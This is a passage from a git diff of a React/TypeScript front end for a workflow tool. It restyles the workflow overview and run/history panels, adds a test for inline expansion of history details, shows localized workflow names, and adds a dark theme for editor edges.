+function MetaRow({ icon, label, value }: { icon: ReactNode; label: string; value: ReactNode }) {
   return (
-    <div className="flex items-start gap-2.5 py-2.5 border-b border-gray-50 last:border-0">
+    <div className="flex items-start gap-2.5 py-2.5 border-b border-gray-100 last:border-0">
       <span className="text-gray-400 mt-0.5 flex-shrink-0">{icon}</span>
       <span className="text-xs text-gray-500 w-16 flex-shrink-0 pt-0.5">{label}</span>
       <span className="text-xs text-gray-800 font-medium flex-1 break-all">{value}</span>
@@ -18,18 +23,94 @@ function MetaRow({ icon, label, value }: { icon: React.ReactNode; label: string;
 
 function StatCard({ value, label, color }: { value: string | number; label: string; color: string }) {
   return (
-    <div className="bg-gray-50 rounded-lg p-3 text-center">
-      <div className={`text-xl font-bold ${color}`}>{value}</div>
-      <div className="text-xs text-gray-500 mt-0.5">{label}</div>
+    <div className="rounded-md border border-gray-100 bg-gray-50/70 px-2.5 py-2">
+      <div className="text-[11px] leading-4 text-gray-500">{label}</div>
+      <div className={`mt-0.5 text-sm font-semibold leading-5 tabular-nums ${color}`}>
+        {value}
+      </div>
     </div>
   );
 }
 
-export default function OverviewTab({ workflow }: OverviewTabProps) {
+function WorkflowFileList({ jsonPath, mdPath }: { jsonPath: string; mdPath: string }) { // Renders the two given paths as labelled code lines ("workflow.json" / "workflow.md")
+  return (
+    <div className="space-y-1.5 min-w-0">
+      <div className="min-w-0">
+        <span className="text-[11px] text-gray-400">workflow.json</span>
+        <code className="block mt-0.5 rounded bg-gray-50 px-2 py-1 text-[11px] leading-4 text-gray-700 break-all">
+          {jsonPath}
+        </code>
+      </div>
+      <div className="min-w-0">
+        <span className="text-[11px] text-gray-400">workflow.md</span>
+        <code className="block mt-0.5 rounded bg-gray-50 px-2 py-1 text-[11px] leading-4 text-gray-700 break-all">
+          {mdPath}
+        </code>
+      </div>
+    </div>
+  );
+}
+
+function CollapsibleSection({
+  title,
+  summary,
+  expanded,
+  onToggle,
+  children,
+}: {
+  title: string;
+  summary?: ReactNode;
+  expanded: boolean;
+  onToggle: () => void;
+  children: ReactNode;
+}) {
+  // Controlled disclosure: the header button reports `expanded` through aria-expanded and
+  // calls `onToggle` on click; `children` are mounted only while `expanded` is true.
+  const Chevron = expanded ? ChevronDown : ChevronRight;
+  return (
+    <section className="border-b border-gray-100 last:border-b-0">
+      <button
+        type="button"
+        aria-expanded={expanded}
+        onClick={onToggle}
+        className="w-full flex items-center justify-between gap-3 px-4 py-3 text-left hover:bg-gray-50 transition-colors"
+      >
+        <div className="min-w-0">
+          <h3 className="text-sm font-semibold text-gray-900">{title}</h3>
+          {summary && (
+            <div className="mt-0.5 text-xs text-gray-400 truncate">
+              {summary}
+            </div>
+          )}
+        </div>
+        <Chevron className="w-4 h-4 text-gray-400 flex-shrink-0" />
+      </button>
+      {expanded && (
+        <div className="px-4 pb-4">
+          {children}
+        </div>
+      )}
+    </section>
+  );
+}
+
+export default function OverviewTab({
+  workflow,
+  latestExecution = null,
+  onLatestExecutionChange,
+  onExecutionSettled,
+}: OverviewTabProps) {
   const { t, i18n } = useTranslation('workflow');
+  const [configExpanded, setConfigExpanded] = useState(true);
+  const [runExpanded, setRunExpanded] = useState(true);
   const { stats } = workflow;
   const successRate =
     stats.callCount > 0 ? ((stats.successCount / stats.callCount) * 100).toFixed(1) : '0';
+  const avgRuntime = `${stats.avgRuntime.toFixed(2)}s`;
+  const runSummary = `${t('detail.overview.totalCalls')} ${stats.callCount} / ${t('detail.overview.successRate')} ${successRate}% / ${t('detail.overview.avgRuntime')} ${avgRuntime}`;
+  const workflowDir = workflow.source === 'global'
+    ? `~/.flocks/plugins/workflows/${workflow.id}/`
+    : `.flocks/plugins/workflows/${workflow.id}/`;
 
   const locale = i18n.language;
   const createdAt = new Date(workflow.createdAt).toLocaleString(locale, {
@@ -48,73 +129,104 @@ export default function OverviewTab({ workflow }: OverviewTabProps) {
   });
 
   return (
-    <div className="flex flex-col gap-5 p-4 overflow-y-auto h-full">
-      {/* Metadata */}
-      <section>
-        <h3 className="text-xs font-semibold text-gray-400 uppercase tracking-wider mb-2">
-          {t('detail.overview.configInfo')}
-        </h3>
-        <div className="bg-white rounded-lg border border-gray-100 px-3">
-          <MetaRow
-            icon={<Layers className="w-3.5 h-3.5" />}
-            label={t('detail.overview.nodeCount')}
-            value={t('detail.overview.nodesAndEdges', {
-              nodes: workflow.workflowJson.nodes.length,
-              edges: workflow.workflowJson.edges.length,
-            })}
-          />
-          <MetaRow
-            icon={<Tag className="w-3.5 h-3.5" />}
-            label={t('detail.overview.category')}
-            value={workflow.category}
-          />
-          {workflow.workflowJson.version && (
+    <div className="h-full overflow-y-auto bg-white">
+      <CollapsibleSection
+        title={t('detail.overview.configInfo')}
+        summary={t('detail.overview.nodesAndEdges', {
+          nodes: workflow.workflowJson.nodes.length,
+          edges: workflow.workflowJson.edges.length,
+        })}
+        expanded={configExpanded}
+        onToggle={() => setConfigExpanded(v => !v)}
+      >
+        <div className="space-y-4">
+          <div className="divide-y divide-gray-100">
             <MetaRow
-              icon={<Activity className="w-3.5 h-3.5" />}
-              label={t('detail.overview.version')}
-              value={workflow.workflowJson.version}
+              icon={<Layers className="w-3.5 h-3.5" />}
+              label={t('detail.overview.nodeCount')}
+              value={t('detail.overview.nodesAndEdges', {
+                nodes: workflow.workflowJson.nodes.length,
+                edges: workflow.workflowJson.edges.length,
+              })}
             />
-          )}
-          {workflow.createdBy && (
             <MetaRow
-              icon={<User className="w-3.5 h-3.5" />}
-              label={t('detail.overview.createdBy')}
-              value={workflow.createdBy}
+              icon={<Tag className="w-3.5 h-3.5" />}
+              label={t('detail.overview.category')}
+              value={workflow.category}
             />
-          )}
-          <MetaRow
-            icon={<Calendar className="w-3.5 h-3.5" />}
-            label={t('detail.overview.createdAt')}
-            value={createdAt}
-          />
-          <MetaRow
-            icon={<Clock className="w-3.5 h-3.5" />}
-            label={t('detail.overview.updatedAt')}
-            value={updatedAt}
-          />
+            {workflow.workflowJson.version && (
+              <MetaRow
+                icon={<Activity className="w-3.5 h-3.5" />}
+                label={t('detail.overview.version')}
+                value={workflow.workflowJson.version}
+              />
+            )}
+            {workflow.createdBy && (
+              <MetaRow
+                icon={<User className="w-3.5 h-3.5" />}
+                label={t('detail.overview.createdBy')}
+                value={workflow.createdBy}
+              />
+            )}
+            <MetaRow
+              icon={<Calendar className="w-3.5 h-3.5" />}
+              label={t('detail.overview.createdAt')}
+              value={createdAt}
+            />
+            <MetaRow
+              icon={<Clock className="w-3.5 h-3.5" />}
+              label={t('detail.overview.updatedAt')}
+              value={updatedAt}
+            />
+            <MetaRow
+              icon={<FileText className="w-3.5 h-3.5" />}
+              label={t('detail.overview.workflowFiles')}
+              value={(
+                <WorkflowFileList
+                  jsonPath={`${workflowDir}workflow.json`}
+                  mdPath={`${workflowDir}workflow.md`}
+                />
+              )}
+            />
+          </div>
         </div>
-      </section>
+      </CollapsibleSection>
 
-      {/* Run statistics */}
-      <section>
-        <h3 className="text-xs font-semibold text-gray-400 uppercase tracking-wider mb-2">
-          {t('detail.overview.runStats')}
-        </h3>
-        <div className="grid grid-cols-2 gap-2">
-          <StatCard value={stats.callCount}                         label={t('detail.overview.totalCalls')} color="text-gray-900" />
-          <StatCard value={`${successRate}%`}                       label={t('detail.overview.successRate')} color="text-green-600" />
-          <StatCard value={`${stats.avgRuntime.toFixed(2)}s`}       label={t('detail.overview.avgRuntime')} color="text-red-600" />
-          <StatCard value={stats.errorCount}                        label={t('detail.overview.errorCount')} color="text-red-500" />
-        </div>
-        {stats.callCount > 0 && (
-          <div className="mt-2 flex items-center gap-2 text-xs text-gray-500">
-            <CheckCircle className="w-3.5 h-3.5 text-green-500" />
-            <span>{t('detail.overview.successTimes', { count: stats.successCount })}</span>
-            <XCircle className="w-3.5 h-3.5 text-red-400 ml-2" />
-            <span>{t('detail.overview.errorTimes', { count: stats.errorCount })}</span>
+      <CollapsibleSection
+        title={t('detail.overview.run')}
+        summary={runSummary}
+        expanded={runExpanded}
+        onToggle={() => setRunExpanded(v => !v)}
+      >
+        <div className="mb-3">
+          <h4 className="mb-1.5 text-[11px] font-semibold text-gray-400">
+            {t('detail.overview.runStats')}
+          </h4>
+          <div className="grid grid-cols-2 gap-1.5">
+            <StatCard value={stats.callCount}                   label={t('detail.overview.totalCalls')} color="text-gray-900" />
+            <StatCard value={`${successRate}%`}                 label={t('detail.overview.successRate')} color="text-green-600" />
+            <StatCard value={avgRuntime}                        label={t('detail.overview.avgRuntime')} color="text-red-600" />
+            <StatCard value={stats.errorCount}                  label={t('detail.overview.errorCount')} color="text-red-500" />
           </div>
-        )}
-      </section>
+          {stats.callCount > 0 && (
+            <div className="mt-2 flex flex-wrap items-center gap-x-2 gap-y-1 text-[11px] text-gray-500">
+              <CheckCircle className="h-3 w-3 text-green-500" />
+              <span>{t('detail.overview.successTimes', { count: stats.successCount })}</span>
+              <XCircle className="h-3 w-3 text-red-400" />
+              <span>{t('detail.overview.errorTimes', { count: stats.errorCount })}</span>
+            </div>
+          )}
+        </div>
+        <RunTab
+          workflow={workflow}
+          latestExecution={latestExecution}
+          onLatestExecutionChange={onLatestExecutionChange}
+          onExecutionSettled={onExecutionSettled}
+          embedded
+          embeddedTabs
+          hideSectionHeaders
+        />
+      </CollapsibleSection>
     </div>
   );
 }
diff --git a/webui/src/pages/WorkflowDetail/tabs/RunTab.test.tsx b/webui/src/pages/WorkflowDetail/tabs/RunTab.test.tsx
index 231f77f28..9c349e52b 100644
--- a/webui/src/pages/WorkflowDetail/tabs/RunTab.test.tsx
+++ b/webui/src/pages/WorkflowDetail/tabs/RunTab.test.tsx
@@ -246,4 +246,49 @@ describe('RunTab', () => {
     });
   });
 
+  it('expands history execution details directly under the clicked item', async () => {
+    const user = userEvent.setup();
+    const executions = [
+      {
+        id: 'exec-first',
+        workflowId: 'wf-1',
+        inputParams: {},
+        outputResults: { marker: 'first' },
+        status: 'success' as const,
+        startedAt: new Date('2026-01-01T00:00:00Z').getTime(),
+        duration: 1,
+        executionLog: [],
+      },
+      {
+        id: 'exec-second',
+        workflowId: 'wf-1',
+        inputParams: {},
+        outputResults: { marker: 'second' },
+        status: 'success' as const,
+        startedAt: new Date('2026-01-02T00:00:00Z').getTime(),
+        duration: 2,
+        executionLog: [],
+      },
+    ];
+    workflowAPI.getHistory.mockResolvedValue({ data: executions });
+
+    render(
+      <RunTab
+        workflow={baseWorkflow}
+        latestExecution={null}
+        sections={['history']}
+      />,
+    );
+
+    const firstHistoryButton = (await screen.findByText('1.0s')).closest('button'); // rows are located via their duration labels
+    const secondHistoryButton = (await screen.findByText('2.0s')).closest('button');
+    expect(firstHistoryButton).not.toBeNull();
+    expect(secondHistoryButton).not.toBeNull();
+
+    await user.click(firstHistoryButton!);
+
+    const firstDetail = screen.getByText(/"marker": "first"/);
+    expect(firstDetail.compareDocumentPosition(secondHistoryButton!) & Node.DOCUMENT_POSITION_FOLLOWING).toBeTruthy(); // the second row's button must come after the first row's detail in document order
+  });
+
 });
diff --git a/webui/src/pages/WorkflowDetail/tabs/RunTab.tsx b/webui/src/pages/WorkflowDetail/tabs/RunTab.tsx
index 59f505945..ae818e1a5 100644
--- a/webui/src/pages/WorkflowDetail/tabs/RunTab.tsx
+++ b/webui/src/pages/WorkflowDetail/tabs/RunTab.tsx
@@ -19,8 +19,14 @@ interface RunTabProps {
   latestExecution: WorkflowExecution | null;
   onLatestExecutionChange?: (execution: WorkflowExecution | null) => void;
   onExecutionSettled?: () => void;
+  sections?: RunTabSection[];
+  embedded?: boolean;
+  embeddedTabs?: boolean;
+  hideSectionHeaders?: boolean;
 }
 
+export type RunTabSection = 'test' | 'history';
+
 function getExecutionDisplayStatus(execution?: WorkflowExecution | null): string {
   if (!execution) return 'unknown';
   if (execution.status === 'running' && execution.currentPhase) {
@@ -49,18 +55,24 @@ function SectionHeader({
   expanded,
   onToggle,
   badge,
+  embedded = false,
 }: {
   title: string;
   expanded: boolean;
   onToggle: () => void;
   badge?: React.ReactNode;
+  embedded?: boolean;
 }) {
   return (
     <button
       onClick={onToggle}
-      className="w-full flex items-center justify-between px-4 py-3 bg-gray-50 border-b border-gray-100 hover:bg-gray-100 transition-colors text-left"
+      className={`w-full flex items-center justify-between transition-colors text-left ${
+        embedded
+          ? 'px-3 py-2.5 bg-white border-b border-gray-100 hover:bg-gray-50'
+          : 'px-4 py-3 bg-gray-50 border-b border-gray-100 hover:bg-gray-100'
+      }`}
     >
-      <span className="text-xs font-semibold text-gray-700 flex items-center gap-2">
+      <span className={`${embedded ? 'text-sm text-gray-900' : 'text-xs text-gray-700'} font-semibold flex items-center gap-2`}>
         {title}
         {badge}
       </span>
@@ -196,11 +208,15 @@ function TestSection({
   execution,
   onExecutionChange,
   onExecutionSettled,
+  embedded = false,
+  hideSectionHeader = false,
 }: {
   workflow: Workflow;
   execution: WorkflowExecution | null;
   onExecutionChange?: (execution: WorkflowExecution | null) => void;
   onExecutionSettled?: () => void;
+  embedded?: boolean;
+  hideSectionHeader?: boolean;
 }) {
   const { t } = useTranslation('workflow');
   const [expanded, setExpanded] = useState(true);
@@ -269,7 +285,7 @@ function TestSection({
 
     const pollExecution = async () => {
       try {
-        const response = await workflowAPI.getExecution(workflow.id, execution.id);
+        const response = await workflowAPI.getExecution(workflow.id, execution.id, { stepLimit: 0 });
         if (cancelled) return;
         onExecutionChange?.(response.data);
         if (response.data.status === 'running') {
@@ -400,12 +416,20 @@ function TestSection({
   };
 
   const showSampleSaveHint = sampleSaveState === 'saving' || sampleSaveState === 'saved';
+  const bodyExpanded = hideSectionHeader || expanded;
 
   return (
-    <div className="border-b border-gray-100">
-      <SectionHeader title={t('detail.run.testSection')} expanded={expanded} onToggle={() => setExpanded(v => !v)} />
-      {expanded && (
-        <div className="p-4 space-y-3">
+    <div className={embedded ? 'bg-white' : 'border-b border-gray-100'}>
+      {!hideSectionHeader && (
+        <SectionHeader
+          title={t('detail.run.testSection')}
+          expanded={expanded}
+          onToggle={() => setExpanded(v => !v)}
+          embedded={embedded}
+        />
+      )}
+      {bodyExpanded && (
+        <div className={`${embedded ? 'p-3' : 'p-4'} space-y-3`}>
           <div>
             <div className="flex items-center justify-between gap-2 mb-1">
               <label className="block text-xs text-gray-500">{t('detail.run.inputParams')}</label>
@@ -701,10 +725,14 @@ function HistorySection({
   workflowId,
   latestExecutionId,
   onLatestExecutionChange,
+  embedded = false,
+  hideSectionHeader = false,
 }: {
   workflowId: string;
   latestExecutionId?: string;
   onLatestExecutionChange?: (execution: WorkflowExecution | null) => void;
+  embedded?: boolean;
+  hideSectionHeader?: boolean;
 }) {
   const { t } = useTranslation('workflow');
   const [expanded, setExpanded] = useState(true);
@@ -731,7 +759,14 @@ function HistorySection({
       setSelectedExec(prev => {
         if (!prev) return null;
         const updated = res.data.find((e: WorkflowExecution) => e.id === prev.id);
-        return updated ?? prev;
+        if (!updated) return prev;
+        return {
+          ...updated,
+          executionLog: prev.executionLog?.length ? prev.executionLog : updated.executionLog,
+          stepLogOffset: prev.stepLogOffset ?? updated.stepLogOffset,
+          stepLogLimit: prev.stepLogLimit ?? updated.stepLogLimit,
+          stepLogTotal: prev.stepLogTotal ?? updated.stepLogTotal,
+        };
       });
     } catch {
       setHistory([]);
@@ -761,11 +796,33 @@ function HistorySection({
     if (status === 'error' || status === 'FAILED') return <XCircle className="w-3.5 h-3.5 text-red-500" />;
     return <AlertCircle className="w-3.5 h-3.5 text-orange-500" />;
   };
+  const bodyExpanded = hideSectionHeader || expanded;
+
+  // Toggles a history row; full detail is fetched lazily and stale responses are ignored.
+  const toggleExecutionDetail = async (exec: WorkflowExecution) => {
+    const collapsing = selectedExec?.id === exec.id;
+    setSelectedExec(collapsing ? null : exec); // show the list-level record right away
+    if (collapsing) return;
+    try {
+      const { data } = await workflowAPI.getExecution(workflowId, exec.id);
+      // Apply only if this row is still selected, so a late response cannot reopen or replace another row.
+      setSelectedExec(prev => (prev?.id === exec.id ? data : prev));
+    } catch {
+      // Best effort: the list-level record set above stays on screen.
+    }
+  };
 
   return (
-    <div>
-      <SectionHeader title={t('detail.run.historySection')} expanded={expanded} onToggle={() => setExpanded(v => !v)} />
-      {expanded && (
+    <div className={embedded ? 'bg-white' : undefined}>
+      {!hideSectionHeader && (
+        <SectionHeader
+          title={t('detail.run.historySection')}
+          expanded={expanded}
+          onToggle={() => setExpanded(v => !v)}
+          embedded={embedded}
+        />
+      )}
+      {bodyExpanded && (
         <div>
           {loading ? (
             <div className="flex items-center justify-center py-6">
@@ -778,31 +835,32 @@ function HistorySection({
             </div>
           ) : (
             <div>
-              <div className="divide-y divide-gray-100">
+              <div>
                 {history.map((exec) => (
-                  <button
-                    key={exec.id}
-                    onClick={() => setSelectedExec(selectedExec?.id === exec.id ? null : exec)}
-                    className="w-full flex items-center gap-2 px-4 py-2.5 hover:bg-gray-50 transition-colors text-left"
-                  >
-                    {statusIcon(getExecutionDisplayStatus(exec))}
-                    <div className="flex-1 min-w-0">
-                      <p className="text-xs text-gray-700 truncate">{formatTime(exec.startedAt)}</p>
-                    </div>
-                    {exec.duration != null && (
-                      <span className="text-xs text-gray-400 flex-shrink-0">{exec.duration.toFixed(1)}s</span>
-                    )}
-                    {selectedExec?.id === exec.id ? (
-                      <ChevronDown className="w-3 h-3 text-gray-400 flex-shrink-0" />
-                    ) : (
-                      <ChevronRight className="w-3 h-3 text-gray-400 flex-shrink-0" />
+                  <div key={exec.id} className="border-b border-gray-100 last:border-b-0">
+                    <button
+                      onClick={() => void toggleExecutionDetail(exec)}
+                      className="w-full flex items-center gap-2 px-4 py-2.5 hover:bg-gray-50 transition-colors text-left"
+                    >
+                      {statusIcon(getExecutionDisplayStatus(exec))}
+                      <div className="flex-1 min-w-0">
+                        <p className="text-xs text-gray-700 truncate">{formatTime(exec.startedAt)}</p>
+                      </div>
+                      {exec.duration != null && (
+                        <span className="text-xs text-gray-400 flex-shrink-0">{exec.duration.toFixed(1)}s</span>
+                      )}
+                      {selectedExec?.id === exec.id ? (
+                        <ChevronDown className="w-3 h-3 text-gray-400 flex-shrink-0" />
+                      ) : (
+                        <ChevronRight className="w-3 h-3 text-gray-400 flex-shrink-0" />
+                      )}
+                    </button>
+                    {selectedExec?.id === exec.id && (
+                      <HistoryExecDetail exec={selectedExec} />
                     )}
-                  </button>
+                  </div>
                 ))}
               </div>
-              {selectedExec && (
-                <HistoryExecDetail exec={selectedExec} />
-              )}
             </div>
           )}
         </div>
@@ -819,20 +877,97 @@ export default function RunTab({
   latestExecution,
   onLatestExecutionChange,
   onExecutionSettled,
+  sections = ['test', 'history'],
+  embedded = false,
+  embeddedTabs = false,
+  hideSectionHeaders = false,
 }: RunTabProps) {
+  const { t } = useTranslation('workflow');
+  const [activeEmbeddedSection, setActiveEmbeddedSection] = useState<RunTabSection>('test');
+  const showTest = sections.includes('test');
+  const showHistory = sections.includes('history');
+  const activeSection =
+    activeEmbeddedSection === 'test' && showTest
+      ? 'test'
+      : activeEmbeddedSection === 'history' && showHistory
+        ? 'history'
+        : showTest
+          ? 'test'
+          : 'history';
+  const embeddedTabItems = [
+    showTest ? { id: 'test' as const, label: t('detail.run.testSection') } : null,
+    showHistory ? { id: 'history' as const, label: t('detail.run.historySection') } : null,
+  ].filter((item): item is { id: RunTabSection; label: string } => Boolean(item));
+
+  if (embeddedTabs) {
+    return (
+      <div className={embedded ? 'space-y-3' : 'flex-1 min-h-0 overflow-y-auto space-y-3'}>
+        <div className="flex rounded-md bg-gray-100 p-1">
+          {embeddedTabItems.map((item) => (
+            <button
+              key={item.id}
+              type="button"
+              onClick={() => setActiveEmbeddedSection(item.id)}
+              className={`flex-1 rounded px-2 py-1.5 text-xs font-medium transition-colors ${
+                activeSection === item.id
+                  ? 'bg-white text-red-600 shadow-sm'
+                  : 'text-gray-500 hover:text-gray-800'
+              }`}
+            >
+              {item.label}
+            </button>
+          ))}
+        </div>
+        <div className="overflow-hidden rounded-md border border-gray-200 bg-white">
+          {showTest && (
+            <div className={activeSection === 'test' ? 'block' : 'hidden'}>
+              <TestSection
+                workflow={workflow}
+                execution={latestExecution}
+                onExecutionChange={onLatestExecutionChange}
+                onExecutionSettled={onExecutionSettled}
+                embedded={embedded}
+                hideSectionHeader={hideSectionHeaders}
+              />
+            </div>
+          )}
+          {showHistory && (
+            <div className={activeSection === 'history' ? 'block' : 'hidden'}>
+              <HistorySection
+                workflowId={workflow.id}
+                latestExecutionId={latestExecution?.id}
+                onLatestExecutionChange={onLatestExecutionChange}
+                embedded={embedded}
+                hideSectionHeader={hideSectionHeaders}
+              />
+            </div>
+          )}
+        </div>
+      </div>
+    );
+  }
+
   return (
-    <div className="flex-1 min-h-0 overflow-y-auto divide-y divide-gray-100">
-      <TestSection
-        workflow={workflow}
-        execution={latestExecution}
-        onExecutionChange={onLatestExecutionChange}
-        onExecutionSettled={onExecutionSettled}
-      />
-      <HistorySection
-        workflowId={workflow.id}
-        latestExecutionId={latestExecution?.id}
-        onLatestExecutionChange={onLatestExecutionChange}
-      />
+    <div className={embedded ? 'space-y-3' : 'flex-1 min-h-0 overflow-y-auto divide-y divide-gray-100'}>
+      {showTest && (
+        <TestSection
+          workflow={workflow}
+          execution={latestExecution}
+          onExecutionChange={onLatestExecutionChange}
+          onExecutionSettled={onExecutionSettled}
+          embedded={embedded}
+          hideSectionHeader={hideSectionHeaders}
+        />
+      )}
+      {showHistory && (
+        <HistorySection
+          workflowId={workflow.id}
+          latestExecutionId={latestExecution?.id}
+          onLatestExecutionChange={onLatestExecutionChange}
+          embedded={embedded}
+          hideSectionHeader={hideSectionHeaders}
+        />
+      )}
     </div>
   );
 }
diff --git a/webui/src/pages/WorkflowEditor/components/PropertyPanel.tsx b/webui/src/pages/WorkflowEditor/components/PropertyPanel.tsx
index 21bee14f6..751e38b5c 100644
--- a/webui/src/pages/WorkflowEditor/components/PropertyPanel.tsx
+++ b/webui/src/pages/WorkflowEditor/components/PropertyPanel.tsx
@@ -3,6 +3,7 @@ import { X, Code2, FileText, Key, Settings, Wrench, Sparkles, Globe, Workflow as
 import { Node } from '@xyflow/react';
 import { useTranslation } from 'react-i18next';
 import { workflowAPI, Workflow } from '@/api/workflow';
+import { getWorkflowDisplayName } from '@/utils/workflowDisplay';
 
 interface PropertyPanelProps {
   selectedNode: Node | null;
@@ -74,7 +75,7 @@ export default function PropertyPanel({
   onClose,
   onUpdate,
 }: PropertyPanelProps) {
-  const { t } = useTranslation('workflow');
+  const { t, i18n } = useTranslation('workflow');
   const nodeTypeLabels: Record<string, string> = {
     python: t('editor.nodeTypes.python'),
     logic: t('editor.nodeTypes.logic'),
@@ -426,7 +427,7 @@ export default function PropertyPanel({
                 <option value="">{t('editor.selectWorkflow')}</option>
                 {availableWorkflows.map((wf) => (
                   <option key={wf.id} value={wf.id}>
-                    {wf.name}
+                    {getWorkflowDisplayName(wf, i18n.language)}
                   </option>
                 ))}
               </select>
diff --git a/webui/src/pages/WorkflowEditor/index.tsx b/webui/src/pages/WorkflowEditor/index.tsx
index d82682280..536e15a35 100644
--- a/webui/src/pages/WorkflowEditor/index.tsx
+++ b/webui/src/pages/WorkflowEditor/index.tsx
@@ -1,4 +1,4 @@
-import React, { useState, useCallback, useEffect } from 'react';
+import React, { useState, useCallback, useContext, useEffect, useMemo } from 'react';
 import { useTranslation } from 'react-i18next';
 import { useParams, useNavigate } from 'react-router-dom';
 import {
@@ -32,6 +32,7 @@ import {
   Trash2,
 } from 'lucide-react';
 import { workflowAPI, Workflow, WorkflowExecution, WorkflowJSON, WorkflowNode as APINode } from '@/api/workflow';
+import { ThemeContext } from '@/contexts/ThemeContext';
 import { extractErrorMessage } from '@/utils/error';
 import {
   buildWorkflowGraphLayout,
@@ -39,6 +40,7 @@ import {
   type WorkflowGraphEdgeRoute,
   type WorkflowGraphOutputHandle,
 } from '@/utils/workflowGraphLayout';
+import { getWorkflowDisplayName } from '@/utils/workflowDisplay';
 
 // 自定义节点组件
 import PythonNode from './nodes/PythonNode';
@@ -91,13 +93,15 @@ const nodeMiniMapColors: Record<string, string> = {
   subworkflow: '#fb923c',
 };
 
-const edgeTheme: Record<WorkflowGraphEdgeRoute['kind'], {
+type EdgeTheme = Record<WorkflowGraphEdgeRoute['kind'], {
   stroke: string;
   label: string;
   labelBg: string;
   strokeWidth: number;
   strokeDasharray?: string;
-}> = {
+}>;
+
+const LIGHT_EDGE_THEME: EdgeTheme = {
   default: {
     stroke: '#94a3b8',
     label: '#64748b',
@@ -125,10 +129,39 @@ const edgeTheme: Record<WorkflowGraphEdgeRoute['kind'], {
   },
 };
 
+const DARK_EDGE_THEME: EdgeTheme = { // edge colours per route kind, chosen by WorkflowEditor when theme === 'dark'
+  default: {
+    stroke: '#5a6573',
+    label: '#b8c2cc',
+    labelBg: '#303842',
+    strokeWidth: 1.8,
+  },
+  branch: {
+    stroke: '#f59e0b',
+    label: '#fbbf24',
+    labelBg: '#3d3424',
+    strokeWidth: 2.2,
+  },
+  loop: {
+    stroke: '#a78bfa',
+    label: '#c4b5fd',
+    labelBg: '#363047',
+    strokeWidth: 2,
+  },
+  back: { // same colours and width as `default`; only the dash pattern differs
+    stroke: '#5a6573',
+    label: '#b8c2cc',
+    labelBg: '#303842',
+    strokeWidth: 1.8,
+    strokeDasharray: '6 5',
+  },
+};
+
 function buildReactFlowEdge(
   edge: WorkflowJSON['edges'][number],
   index: number,
-  route: WorkflowGraphEdgeRoute = { kind: 'default' }
+  route: WorkflowGraphEdgeRoute = { kind: 'default' },
+  edgeTheme: EdgeTheme = LIGHT_EDGE_THEME
 ): Edge {
   const theme = edgeTheme[route.kind];
 
@@ -165,7 +198,7 @@ function buildReactFlowEdge(
 }
 
 // 将后端数据转换为 ReactFlow 格式
-function convertToReactFlowFormat(workflowJson: WorkflowJSON): { nodes: Node[]; edges: Edge[] } {
+function convertToReactFlowFormat(workflowJson: WorkflowJSON, edgeTheme: EdgeTheme = LIGHT_EDGE_THEME): { nodes: Node[]; edges: Edge[] } {
   const diagram = buildWorkflowGraphLayout(workflowJson);
   const nodes: Node[] = workflowJson.nodes.map((node) => ({
     id: node.id,
@@ -203,7 +236,7 @@ function convertToReactFlowFormat(workflowJson: WorkflowJSON): { nodes: Node[];
   }));
 
   const edges: Edge[] = workflowJson.edges.map((edge, index) =>
-    buildReactFlowEdge(edge, index, diagram.edgeRoutes[workflowGraphEdgeId(edge, index)])
+    buildReactFlowEdge(edge, index, diagram.edgeRoutes[workflowGraphEdgeId(edge, index)], edgeTheme)
   );
 
   return { nodes, edges };
@@ -250,7 +283,7 @@ interface EdgeData {
   const?: Record<string, any>;
 }
 
-function applyGraphSemantics(nodes: Node[], edges: Edge[], workflow: Workflow): { nodes: Node[]; edges: Edge[] } {
+function applyGraphSemantics(nodes: Node[], edges: Edge[], workflow: Workflow, edgeTheme: EdgeTheme = LIGHT_EDGE_THEME): { nodes: Node[]; edges: Edge[] } {
   const workflowJson = convertToWorkflowJSON(nodes, edges, workflow);
   const diagram = buildWorkflowGraphLayout(workflowJson);
   const updatedNodes = nodes.map((node) => ({
@@ -261,7 +294,7 @@ function applyGraphSemantics(nodes: Node[], edges: Edge[], workflow: Workflow):
     },
   }));
   const updatedEdges = workflowJson.edges.map((edge, index) =>
-    buildReactFlowEdge(edge, index, diagram.edgeRoutes[workflowGraphEdgeId(edge, index)])
+    buildReactFlowEdge(edge, index, diagram.edgeRoutes[workflowGraphEdgeId(edge, index)], edgeTheme)
   );
 
   return { nodes: updatedNodes, edges: updatedEdges };
@@ -325,9 +358,12 @@ function convertToWorkflowJSON(nodes: Node[], edges: Edge[], workflow: Workflow)
 }
 
 export default function WorkflowEditor() {
-  const { t } = useTranslation('workflow');
+  const { t, i18n } = useTranslation('workflow');
+  const { theme } = useContext(ThemeContext);
   const { id } = useParams<{ id: string }>();
   const navigate = useNavigate();
+  const isDark = theme === 'dark';
+  const edgeTheme = useMemo(() => (isDark ? DARK_EDGE_THEME : LIGHT_EDGE_THEME), [isDark]);
 
   const [workflow, setWorkflow] = useState<Workflow | null>(null);
   const [nodes, setNodes, onNodesChange] = useNodesState<Node>([]);
@@ -358,6 +394,13 @@ export default function WorkflowEditor() {
     }
   }, [currentExecution]);
 
+  useEffect(() => { // rebuild nodes/edges through applyGraphSemantics using the current edge theme
+    if (!workflow) return; // workflow state is still null, so there is no graph to rebuild
+    const refreshed = applyGraphSemantics(nodes, edges, workflow, edgeTheme);
+    setNodes(refreshed.nodes);
+    setEdges(refreshed.edges);
+  }, [edgeTheme]); // NOTE(review): nodes/edges/workflow are left out of the deps, presumably so this only re-runs on a theme switch; confirm
+
   useEffect(() => {
     if (!id || !showExecutionPanel || !currentExecution?.id || currentExecution.status !== 'running') {
       return;
@@ -396,7 +439,7 @@ export default function WorkflowEditor() {
       const response = await workflowAPI.get(id!);
       setWorkflow(response.data);
       
-      const { nodes: flowNodes, edges: flowEdges } = convertToReactFlowFormat(response.data.workflowJson);
+      const { nodes: flowNodes, edges: flowEdges } = convertToReactFlowFormat(response.data.workflowJson, edgeTheme);
       setNodes(flowNodes);
       setEdges(flowEdges);
     } catch (error: any) {
@@ -451,13 +494,13 @@ export default function WorkflowEditor() {
           );
 
           if (!workflow) return nextEdges;
-          const refreshed = applyGraphSemantics(nodes, nextEdges, workflow);
+          const refreshed = applyGraphSemantics(nodes, nextEdges, workflow, edgeTheme);
           setNodes(refreshed.nodes);
           return refreshed.edges;
         }
       );
     },
-    [nodes, setEdges, setNodes, workflow]
+    [edgeTheme, nodes, setEdges, setNodes, workflow]
   );
 
   // 节点点击事件 - 显示属性面板
@@ -480,11 +523,11 @@ export default function WorkflowEditor() {
       const nextEdges = applyEdgeChanges(changes, eds);
